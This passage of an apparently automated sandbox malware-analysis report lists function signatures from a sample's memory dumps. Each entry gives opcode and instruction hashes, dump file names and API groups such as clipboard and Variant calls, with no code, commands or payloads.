                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                          • Instruction ID: f2961dfe06883dc9366b6d5b7889bd3f30e2ae97b84dde9ef1a286866ef1ab17
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18D02E2480C63A828A290E1C21500BCAFA28A03711B0A51E4DCC13F0C2DA62CC2712DC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                          • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                          • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                          • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                          • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                          • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                          • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                          • Instruction ID: cc5e03ee11ac258a935ab62de4ea8fae1d24afeb11ab974c19f129201c6544c8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48419F7050C7818ED301AF7C998835FBEE09F86314F488A7DE5EA86392D6788588C793
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID: ($P$W$]$j$x
• API String ID: 2832541153-1642767450
• Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
• Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
• Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
• Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID: L
• API String ID: 2610073882-2909332022
• Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction ID: 0939f7048941c7fe71b3dfa4cf9a86e805982586101f02f187da32c0f3914e66
• Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction Fuzzy Hash: CD412B7110CBC18ED331DB38845865EBFD1ABE6220F188A9CE5F5873E2D6748549CB53
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID: L
• API String ID: 2610073882-2909332022
• Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
• Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
• Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
• Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
• Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
• Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86